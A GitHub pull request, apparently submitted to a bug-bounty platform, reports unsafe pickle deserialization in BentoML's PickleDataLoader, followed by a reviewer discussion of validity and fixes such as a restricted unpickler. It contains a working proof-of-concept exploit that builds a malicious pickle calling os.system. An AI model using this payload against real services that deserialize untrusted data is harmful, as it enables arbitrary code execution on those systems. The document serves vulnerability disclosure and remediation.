### PR TITLE
Arbitrary Code Execution in BentoML

### PR DESCRIPTION
**Pull request by B3EF**
## ✍️ Description
BentoML is a framework for serving, managing, and deploying machine learning models. It is aiming to bridge the gap between Data Science and DevOps, and enable teams to deliver prediction services in a fast, repeatable, and scalable way.
* **Vulnerability discription**
    untrusded loading of data by the picle.loads function leading to Arbitrary code execution.
## 🕵️‍♂️ Proof of Concept
* vulnerable code part
```python

@classmethod
def split_requests(cls, raw: bytes) -> Sequence[HTTPRequest]:
    return pickle.loads(raw)
```
* exploit.py
```python
import os
import pickle
#setup
os.system('pip install bentoml')
from bentoml.marshal.utils import PickleDataLoader
#payload formation
class ArbitrarcyCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
#serilizing payload
dumps = pickle.dumps(ArbitrarcyCode())
#exploiting bentoml
PickleDataLoader.split_requests(dumps)
```

## 💥 Impact
Arbitrary Code Execution
## ☎️ Contact
Not made any contact with the maintaineer/author.
## ✅ Checklist
**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Review by mzfr — COMMENTED** [review]
This is definitely an issue but not sure if this should be valid or not because the pickle module comes with a warning:

> Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

So if the project have to do pickling and they have this util class then it might be possible that they were doing some kind of validation/sanitization before sending the data to this class/function. And this issue only arises because in the exploit we are calling it directly.

Also I am not sure if `pickle` offers any `safe` way to do this, cause if not then having a fix for this issue might not be possible.

**Comment by B3EF** [comment]
hi @mzfr after you have mentioned this issue i was going on through some posts and blogs , i have seen some techniques that some folks have mentioned about how to securely use pickle and avoid the code execution 
[synopsys blog post ](https://www.synopsys.com/blogs/software-security/python-pickling/)
[stackexchange](https://security.stackexchange.com/questions/183966/safely-load-a-pickle-file)
# from the python documentation
Consider signing data with hmac if you need to ensure that it has not been tampered with.
Safer serialization formats such as json may be more appropriate if you are processing untrusted data. See Comparison with json.

**Comment by mzfr** [comment]
@B3EF In those blog post we see that the data should be signed by the `hmac` but the problem in that is in this package data is not travelling over the network. But even if we consider that we signed the data via hmac even then this vulnerability could be exploited.

__How?__ 

Because in your exploit you are calling the function directly so if the FIX is to add hmac then in your next exploit all you have to do is to send `hmac+payload` instead of just `payload`. 

This hmac fix would only work if the `hmac` is sent by a trusted party.

***

In my opinion best way to decide is to ask the maintainer if they were aware of this issue or not? And if they were not then wether they can think of any way to do that pickling/unpickling safely?

**Comment by B3EF** [comment]
> @B3EF In those blog post we see that the data should be signed by the `hmac` but the problem in that is in this package data is not travelling over the network. But even if we consider that we signed the data via hmac even then this vulnerability could be exploited.
> 
> **How?**
> 
> Because in your exploit you are calling the function directly so if the FIX is to add hmac then in your next exploit all you have to do is to send `hmac+payload` instead of just `payload`.
> 
> This hmac fix would only work if the `hmac` is sent by a trusted party.
> 
> In my opinion best way to decide is to ask the maintainer if they were aware of this issue or not? And if they were not then wether they can think of any way to do that pickling/unpickling safely?

oh ok,
i think there is also one more way to fix these issue we can sanitize the data formed by the dumps() ,
when i have took a look on it with different payloads passed , we will be able to view it as clear texts . so i think we will be able to sanitize the dumps data if any shell commands  / any systemd program aliases is being passed before into the loads function.
don't knew weather its right or not but just an assumption.
anyway thanks for your suggestion . <3

**Review by mufeedvh — COMMENTED** [review]
This issue seems valid since it is directly exploited by importing the function. And there is a warning shown, although this vulnerability can be easily fixed by `unpickling` it and validating for imported modules in the pickle input, for example: allowing only `__builtin__` functions except the `os` module of course. (Maybe an extra validation for `eval()` too?)

**Something like this:** (Just an example)

```python
class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        """Only allow safe classes from builtins"""
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        """Forbid everything else"""
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()"""
    return RestrictedUnpickler(io.BytesIO(s)).load()
```

What do you think? @mzfr @Mik317 @bbeale @toufik-airane 

![huntr sheriff](https://img.shields.io/badge/SHERIFF-red?labelColor=black&link=https://www.huntr.dev&style=flat-square&logo=data:image/png;base64,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)

File: bounties/pip/BentoML/1/README.md [hunk 1]
```diff
@@ -0,0 +1,25 @@
+# Description
+BentoML is a framework for serving, managing, and deploying machine learning models. It is aiming to bridge the gap between Data Science and DevOps, and enable teams to deliver prediction services in a fast, repeatable, and scalable way.
+* **Vulnerability discription**
+    untrusded loading of data by the picle.load function leading to Arbitrary code execution.
+# Proof of Concept
+
+1. run exploit.py
+```python
+// exploit.py
```
Comment (Mik317) [inline bounties/pip/BentoML/1/README.md:9]: Invalid in `python`: comments made with `#`

**Review by Mik317 — APPROVED** [review]
LGTM :smile: :cake:
Definitely I agree with @mufeedvh on reproducibility and fixability too :+1: 

Screenshot from 2020-12-23 13-35-30


Cheers,
Mik

File: bounties/pip/BentoML/1/README.md (hunk 1 above)
Comment (B3EF) [reply bounties/pip/BentoML/1/README.md]: changed ..

**Review by toufik-airane — APPROVED** [review]

**Review by mufeedvh — APPROVED** [review]

**Pull request merged**